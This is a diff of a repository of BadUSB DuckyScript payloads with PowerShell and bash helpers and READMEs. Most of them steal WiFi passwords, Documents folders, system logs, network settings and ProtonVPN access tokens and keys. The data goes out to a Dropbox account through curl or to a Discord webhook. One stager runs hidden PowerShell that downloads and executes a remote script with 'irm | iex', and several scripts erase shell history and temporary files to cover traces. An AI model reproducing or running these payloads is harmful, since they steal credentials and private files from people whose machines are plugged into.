STRING SUDO_PASS
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
REM Required: Set here your Dropbox access TOKEN
|
||||||
|
DEFINE TOKEN example
|
||||||
|
STRING ACCESS_TOKEN="
|
||||||
|
STRING TOKEN
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
|
||||||
|
REM #### ZIP SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING ZIP_NAME="$RANDOM.zip"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home" prefix-XXXXXXXXXX)
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING ZIP_PATH="/home/$ZIP_NAME"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
|
||||||
|
REM #### WiFi && ZIP SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
REM Get all WiFi data
|
||||||
|
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING done
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Wifi exfiltration command time - It depends
|
||||||
|
DELAY 1000
|
||||||
|
|
||||||
|
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
|
||||||
|
REM Zip operation time - It depends
|
||||||
|
DELAY 3000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### EXFILTRATE SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
REM Set yout Dropbox folder name
|
||||||
|
DEFINE DROPBOX_FOLDER_NAME example
|
||||||
|
STRING DROPBOX_FOLDER="/
|
||||||
|
ENTER
|
||||||
|
STRING DROPBOX_FOLDER_NAME
|
||||||
|
ENTER
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||||
|
STRING curl -X POST
|
||||||
|
STRING DROPBOX_API_CONST
|
||||||
|
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
|
||||||
|
REM #### REMOVE TRACES ####
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
STRING history -c
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING rm -rf "$TMP_FOLDER_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING rm -rf "$ZIP_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,6 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
|
||||||
|
nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -
|
||||||
|
nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -
|
||||||
|
done
|
|
@ -0,0 +1,26 @@
|
||||||
|
# WLAN Windows Password - BADUSB ✅
|
||||||
|
|
||||||
|
A script used to stole target WLAN Passwords.
|
||||||
|
|
||||||
|
**Category**: WLAN, Credentials
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to stole target WLAN Passwords.
|
||||||
|
|
||||||
|
Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||||
|
|
||||||
|
Then it cleans up traces of what you have done after.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* An internet connection
|
||||||
|
* Windows 10,11
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
* Invoke 2 netsh commands
|
||||||
|
* Invoke-WebRequest will be entered in the Run Box to send the content
|
|
@ -0,0 +1,16 @@
|
||||||
|
|
||||||
|
# ENG
|
||||||
|
netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {
|
||||||
|
$wlan = $_.Matches.Value
|
||||||
|
$passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
|
||||||
|
|
||||||
|
$Body = @{
|
||||||
|
'username' = $env:username + " | " + [string]$wlan
|
||||||
|
'content' = [string]$passw
|
||||||
|
}
|
||||||
|
|
||||||
|
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)
|
||||||
|
}
|
||||||
|
|
||||||
|
# Clear the PowerShell command history
|
||||||
|
Clear-History
|
|
@ -0,0 +1,25 @@
|
||||||
|
REM ###################################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : WLAN-Windows-Passwords-Discord-Exfiltration |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Description: A script used to stole target WLAN Passwords. |
|
||||||
|
REM # Category : Credentials |
|
||||||
|
REM # Target : Windows 10-11 |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # |
|
||||||
|
REM ###################################################################
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
GUI r
|
||||||
|
DELAY 250
|
||||||
|
STRING powershell -w h -ep bypass $discord='
|
||||||
|
|
||||||
|
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||||
|
DEFINE DISCORD example.com
|
||||||
|
STRING DISCORD
|
||||||
|
|
||||||
|
REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
|
||||||
|
DEFINE PAYLOAD example.com
|
||||||
|
STRINGLN ';irm PAYLOAD | iex
|
|
@ -0,0 +1,28 @@
|
||||||
|
|
||||||
|
# Change MAC Address
|
||||||
|
|
||||||
|
A script used to change the MAC address on a Linux machine.
|
||||||
|
|
||||||
|
**Category**: Execution
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to change the MAC address on a Linux machine.
|
||||||
|
|
||||||
|
Opens a shell, get the network card name, set the new MAC address, erase traces.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* Linux Permissions
|
||||||
|
* Internet Connection
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the sudo password
|
||||||
|
* Change as you want the new MAC address
|
|
@ -0,0 +1,73 @@
|
||||||
|
|
||||||
|
REM ###########################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Change Linux MAC Address |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Execution |
|
||||||
|
REM # Target : Linux |
|
||||||
|
REM # |
|
||||||
|
REM ###########################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Permissions
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### PERMISSIONS SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
REM You need to know the sudo password and replace 'example' with this
|
||||||
|
DEFINE SUDO_PASS example
|
||||||
|
|
||||||
|
STRING sudo su
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
STRING SUDO_PASS
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### MAC SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
REM net-tools command
|
||||||
|
STRING apt install net-tools
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
REM Set here your preferred MAC, you can don't change it remaining with the default value
|
||||||
|
DEFINE NEW_MAC FF:FF:FF:FF:FF:FF
|
||||||
|
|
||||||
|
REM Get the net interface name
|
||||||
|
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING ifconfig $INTERFACE down
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING ifconfig $INTERFACE hw ether
|
||||||
|
STRING NEW_MAC
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
STRING ifconfig $INTERFACE up
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
|
||||||
|
REM #### REMOVE TRACES ####
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
STRING history -c
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Close shell
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,27 @@
|
||||||
|
|
||||||
|
# Change Network Configuration
|
||||||
|
|
||||||
|
A script used to change the network configuration on a Linux machine.
|
||||||
|
|
||||||
|
**Category**: Execution
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to change the network configuration on a Linux machine.
|
||||||
|
|
||||||
|
Opens a shel, get the network card name, set the network configuration, erase traces.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* Linux Permissions
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the sudo password
|
||||||
|
* Change as you want the network configuration
|
|
@ -0,0 +1,81 @@
|
||||||
|
|
||||||
|
REM ###############################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Change Network Configuration |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Execution |
|
||||||
|
REM # Target : Linux |
|
||||||
|
REM # |
|
||||||
|
REM ###############################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Permissions
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### PERMISSIONS SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
REM Required: You need to know the sudo password and replace 'example' with this
|
||||||
|
DEFINE SUDO_PASS example
|
||||||
|
STRING sudo su
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
STRING SUDO_PASS
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
|
||||||
|
|
||||||
|
REM #### IP SECTION ####
|
||||||
|
|
||||||
|
|
||||||
|
REM net-tools command
|
||||||
|
STRING apt install net-tools
|
||||||
|
ENTER
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
REM Set network interface
|
||||||
|
DEFINE IP 192.168.1.100
|
||||||
|
DEFINE MASK 255.255.255.0
|
||||||
|
DEFINE GATEWAY 192.168.1.1
|
||||||
|
|
||||||
|
STRING IP="
|
||||||
|
STRING IP
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING MASK="
|
||||||
|
STRING MASK
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING GATEWAY="
|
||||||
|
STRING GATEWAY
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Get the net interface name
|
||||||
|
STRING INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING ifconfig $INTERFACE $IP netmask $MASK up
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
|
||||||
|
REM #### REMOVE TRACES ####
|
||||||
|
|
||||||
|
|
||||||
|
STRING history -c
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
REM Close shell
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,32 @@
|
||||||
|
# Exfiltrate Linux Content With Dropbox - BADUSB ✅
|
||||||
|
|
||||||
|
A script used to take folder content on Linux Systems.
|
||||||
|
|
||||||
|
**Category**: Exfiltration, Execution
|
||||||
|
|
||||||
|
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to take folder content on Linux Systems.
|
||||||
|
|
||||||
|
Opens a shel, zip all zippable (R permission) content of the folder, send the zip into the dropbox folder, delete shell history.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* Internet Connection
|
||||||
|
* Linux System
|
||||||
|
* * Terminal that can be opened by the shortcommand CTRL-ALT t
|
||||||
|
* DropBox Account for the access token
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set your dropbox access token
|
||||||
|
* Set the folder path interessed (i.e. /Documents)
|
||||||
|
* Change (if you think that it is necessary) the delay of the zipping operation
|
|
@ -0,0 +1,82 @@
|
||||||
|
REM ##########################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Exfiltrate Linux Content With Dropbox |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Exfiltration, Execution |
|
||||||
|
REM # Target : Linux |
|
||||||
|
REM # |
|
||||||
|
REM ##########################################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Internet Connection
|
||||||
|
REM - Dropbox Account
|
||||||
|
REM - - DROPBOX_ACCESS_TOKEN
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
REM Required: Set here your Dropbox access TOKEN
|
||||||
|
DEFINE TOKEN example
|
||||||
|
STRING ACCESS_TOKEN="
|
||||||
|
STRING TOKEN
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING USER_NAME=$(whoami)
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING path="/home/$USER_NAME/Documents"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING NAME="$RANDOM.zip"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING ZIP_PATH="$path/$NAME"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
REM The FOLDER that you want to zip, in this example you want to zip all Documents content
|
||||||
|
STRING FOLDER="/home/$USER_NAME/Documents/"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Delay for zipping operation, it depends by computer power and folder directory
|
||||||
|
DELAY 10000
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING if [ -r "$FOLDER" ]; then
|
||||||
|
ENTER
|
||||||
|
STRING zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1
|
||||||
|
ENTER
|
||||||
|
STRING else
|
||||||
|
ENTER
|
||||||
|
STRING echo ""
|
||||||
|
ENTER
|
||||||
|
STRING fi
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING DROPBOX_FOLDER="/$NAME"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||||
|
STRING curl -X POST
|
||||||
|
STRING DROPBOX_API_CONST
|
||||||
|
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
STRING history -c
|
||||||
|
ENTER
|
|
@ -0,0 +1,33 @@
|
||||||
|
|
||||||
|
# Exfiltrate Linux Log Files - BADUSB ✅
|
||||||
|
|
||||||
|
A script used to take linux logs.
|
||||||
|
|
||||||
|
**Category**: Exfiltration, Execution
|
||||||
|
|
||||||
|
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to take linux logs.
|
||||||
|
|
||||||
|
Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* Internet Connection
|
||||||
|
* Linux System
|
||||||
|
* * Terminal that can be opened by the shortcommand CTRL-ALT t
|
||||||
|
* DropBox Account for the access token
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set your dropbox access token
|
||||||
|
* Change if needed the folder path interessed (i.e. /var/log)
|
||||||
|
* Change (if you think that it is necessary) the delay of the zipping operation
|
|
@ -0,0 +1,80 @@
|
||||||
|
REM ######################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Exfiltrate Linux Logs With Dropbox |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Exfiltration, Execution |
|
||||||
|
REM # Target : Linux |
|
||||||
|
REM # |
|
||||||
|
REM ######################################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Internet Connection
|
||||||
|
REM - Dropbox Account
|
||||||
|
REM - - DROPBOX_ACCESS_TOKEN
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
|
||||||
|
REM Required: Set here your Dropbox access TOKEN
|
||||||
|
DELAY 2000
|
||||||
|
DEFINE TOKEN example
|
||||||
|
STRING ACCESS_TOKEN="
|
||||||
|
STRING TOKEN
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING USER_NAME=$(whoami)
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Create random num
|
||||||
|
DELAY 500
|
||||||
|
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Folder path
|
||||||
|
DELAY 500
|
||||||
|
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Zip path
|
||||||
|
DELAY 500
|
||||||
|
STRING ZIP_NAME="$RANDOM.zip"
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Default log path
|
||||||
|
DELAY 500
|
||||||
|
STRING LOG_PATH="/var/log/"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Delay of zipping operation - it depends
|
||||||
|
DELAY 10000
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING DROPBOX_FOLDER="/$ZIP_NAME"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Send to Dropbox function
|
||||||
|
DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
|
||||||
|
DELAY 500
|
||||||
|
STRING curl -X POST
|
||||||
|
STRING DROPBOX_API_LINK
|
||||||
|
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Send timing - it depends
|
||||||
|
DELAY 5000
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING rm -rf "$TMP_FOLDER_PATH"
|
||||||
|
ENTER
|
|
@ -0,0 +1,27 @@
|
||||||
|
|
||||||
|
# Exfiltrate Network Configuration - Linux ✅
|
||||||
|
|
||||||
|
A script used to exfiltrate the network configuration on a Linux machine.
|
||||||
|
|
||||||
|
**Category**: Exfiltrate, Execution
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to exfiltrate the network configuration on a Linux machine.
|
||||||
|
|
||||||
|
Opens a shell, get the network card name, get the network configuration using nmcli, send the result to Dropbox, erase traces.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* Internet Connection
|
||||||
|
* Dropbox Token
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the Dropbox token
|
|
@ -0,0 +1,96 @@
|
||||||
|
|
||||||
|
REM ##########################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Exfiltrate Linux Network Configuration |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Exfiltration, Execution |
|
||||||
|
REM # Target : Linux |
|
||||||
|
REM # |
|
||||||
|
REM ##########################################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Internet Connection
|
||||||
|
REM - Dropbox Account
|
||||||
|
REM - - DROPBOX_ACCESS_TOKEN
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
REM Required: Set here your Dropbox access TOKEN
|
||||||
|
DEFINE TOKEN example
|
||||||
|
STRING ACCESS_TOKEN="
|
||||||
|
STRING TOKEN
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM DELAY 500
|
||||||
|
REM STRING USER_NAME=$(whoami)
|
||||||
|
REM ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING ZIP_NAME="$RANDOM.zip"
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Folder path
|
||||||
|
DELAY 500
|
||||||
|
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
REM Delay for zipping operation, it depends by computer power and folder directory
|
||||||
|
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
|
||||||
|
DELAY 3000
|
||||||
|
|
||||||
|
|
||||||
|
REM Set yout Dropbox folder name
|
||||||
|
DEFINE DROPBOX_FOLDER_NAME example
|
||||||
|
STRING DROPBOX_FOLDER="/
|
||||||
|
ENTER
|
||||||
|
STRING DROPBOX_FOLDER_NAME
|
||||||
|
ENTER
|
||||||
|
STRING "
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
|
||||||
|
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||||
|
STRING curl -X POST
|
||||||
|
STRING DROPBOX_API_CONST
|
||||||
|
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
STRING history -c
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING rm -rf "$TMP_FOLDER_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING rm -rf "$ZIP_PATH"
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
DELAY 500
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
|
@ -0,0 +1,37 @@
|
||||||
|
$Path = "$Env:USERPROFILE\AppData\Local\ProtonVPN\ProtonVPN*\*\user.config"
|
||||||
|
|
||||||
|
$Content = Get-Content -Path $Path
|
||||||
|
|
||||||
|
$text = $Path + $Content
|
||||||
|
|
||||||
|
# Discord Connection
|
||||||
|
$hookurl = "$discord"
|
||||||
|
|
||||||
|
# Loop for Discord
|
||||||
|
$ConstantLimitForRestMethod = 1999
|
||||||
|
$TMP_Body = @{
|
||||||
|
'username' = $env:username
|
||||||
|
'content' = ""
|
||||||
|
}
|
||||||
|
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
|
||||||
|
try {
|
||||||
|
$TMP_Body = @{
|
||||||
|
'username' = $env:username
|
||||||
|
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
|
||||||
|
}
|
||||||
|
} catch [ArgumentOutOfRangeException] {
|
||||||
|
if($text.Length-$i -gt 0){
|
||||||
|
$TMP_Body = @{
|
||||||
|
'username' = $env:username
|
||||||
|
'content' = $text.Substring($i, $text.Length-$i)
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($TMP_Body | ConvertTo-Json)
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
# Clear the PowerShell command history
|
||||||
|
Clear-History
|
|
@ -0,0 +1,37 @@
|
||||||
|
# ProtonVPN config file ✅
|
||||||
|
|
||||||
|
A script used to stole target ProtonVPN config file.
|
||||||
|
|
||||||
|
**Category**: Credentials, Exfiltration
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This script will stole target ProtonVPN config file.
|
||||||
|
|
||||||
|
Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||||
|
In the config file you can find a lot information about the user like:
|
||||||
|
- UserUid
|
||||||
|
- UserAccessToken
|
||||||
|
- UserRefreshToken
|
||||||
|
- UserAuthenticationPublicKey
|
||||||
|
- UserAuthenticationSecretKey
|
||||||
|
- UserAuthenticationCertificatePem
|
||||||
|
- UserCertificationServerPublicKey
|
||||||
|
- and so on...
|
||||||
|
|
||||||
|
Then it cleans up traces of what you have done after.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* ProtonVPN user logged at least one time
|
||||||
|
* An internet connection
|
||||||
|
* Windows 10,11
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
* Invoke Get-Content for get in plaintext the ProtonVPN .config content
|
||||||
|
* Invoke-WebRequest will be entered in the Run Box to send the content
|
||||||
|
|
|
@ -0,0 +1,43 @@
|
||||||
|
REM ###################################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
